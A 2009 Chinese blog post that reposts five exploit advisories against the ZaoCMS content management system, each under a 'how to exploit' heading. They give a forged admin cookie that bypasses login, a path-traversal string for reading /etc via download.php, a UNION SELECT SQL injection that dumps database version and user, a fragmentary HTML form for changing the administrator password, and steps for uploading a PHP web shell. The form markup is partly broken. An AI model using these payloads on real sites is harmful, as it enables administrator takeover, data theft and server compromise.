Chinaunix首页 | 论坛 | 博客
  • 博客访问: 2260935
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-05-24 17:05:36

1.ZaoCMS Insecure Cookie Handling Vulnerability

利用方法
复制内容到剪贴板
代码:
--------------------------------------------------------------
ZaoCMS Insecure Cookie Handling Vulnerability
---------------------------------------------------------------
Founder :ThE g0bL!N
Home:
Software : ZaoCMS
---------------------------------------------------------------
Exploit:
---------
admin/login.php
javascript:document.cookie="admin=stgAdmin;path=/";
Then Go To
admin/edit.php
demo:
-------

-----------------------------------------------------------------------------------------------------
His0k4 - Dr-HTmL , Dos-Dz TeaM , Snakes TeaM ArAb Academy Security Team,And Ev!L-C0d3r.
-----------------------------------------------------------------------------------------------------
2.ZaoCMS (download.php) Remote File Disclosure Vulnerability

利用方法
复制内容到剪贴板
代码:
--------------------------------------------------------------
ZaoCMS Remote File Disclosure Vulnerability
---------------------------------------------------------------
Founder :ThE g0bL!N
Home:
Software : ZaoCMS
Note: The OperatIon Worked By Deleting Your Cookies From The Vuln 1
---------------------------------------------------------------
Exploit:
---------
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F
demo:
-------
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F
-----------------------------------------------------------------------------------------------------
His0k4 - Dr-HTmL , Dos-Dz TeaM , Kondamne , Snakes TeaM ArAb Academy Security Team,And Ev!L-C0d3r.
-----------------------------------------------------------------------------------------------------
3.ZaoCMS (user_id) Remote SQL Injection Vulnerability

利用代码
复制内容到剪贴板
代码:
=By: Qabandi
=Email: iqa[a]hotmail.fr

From Kuwait PEACE

=Vuln: ZaoCMS - SQL Injection Vulnerability
=INFO:
=BUY:
=DORK: --


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@-SQL-Injection-PoC-@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
First we need to use the "Insecure cookiue handling" vulnerability, found at

You add the cookie, javascript:document.cookie="admin=stgAdmin;path=/";

then go to:
UNION SELECT 1,2,version(),4,USER(),6,DATABASE(),8,9,10,11,12--



LIVE DEMO:
UNION SELECT 1,2,version(),4,USER(),6,DATABASE(),8,9,10,11,12--

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-==-==-=-3la-ra7atkum-shabab-=-:P=-=-=-==-=-==-=-=-=-=-=-=-=-
=-=-=-=-==-=-=-=-=-=-No--More---Private=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Salamz: Killer Hack, Mr.Mn7os, Ghost-r00t, All muslim hackers.
Special Thanks: ThE g0bL!N
4.ZaoCMS (user_updated.php) Remote Change Password Exploit

利用代码
复制内容到剪贴板
代码:
action=""
method="post" onsubmit="return checkForm(this);" id=form1 Name=form1>

Cod[3] By ThE g0bL!N ZaoCMS Remote Change Password


ThE g0bL!N




border="0">

width="100" height="20">


disabled /> Site Administrator Priveleges




class="s" />

5.ZaoCMS (PhpCommander) Arbitary Remote File Upload Vulnerability

利用代码
复制内容到剪贴板
代码:
=By: Qabandi
=Email: iqa[a]hotmail.fr

From Kuwait PEACE

=Vuln: ZaoCMS (PhpCommander) - Arbitrary File Upload
=INFO:
=BUY:
=DORK: --


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@-File-Upload-PoC-@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Go to:


Upload shell

location:

http://localhost/documents/SHELL.PHP

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-==-==-=-3la-ra7atkum-shabab-=-:P=-=-=-==-=-==-=-=-=-=-=-=-=-
=-=-=-=-==-=-=-=-=-=-No--More---Private=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Salamz: Killer Hack, Mr.Mn7os, Ghost-r00t, All muslim hackers.
Special Thanks: ThE g0bL!N
阅读(515) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

Contact/Login Info


height="20">Username*
admin/>
height="20">Password*

Real
Name*


Email

  

/>
Phone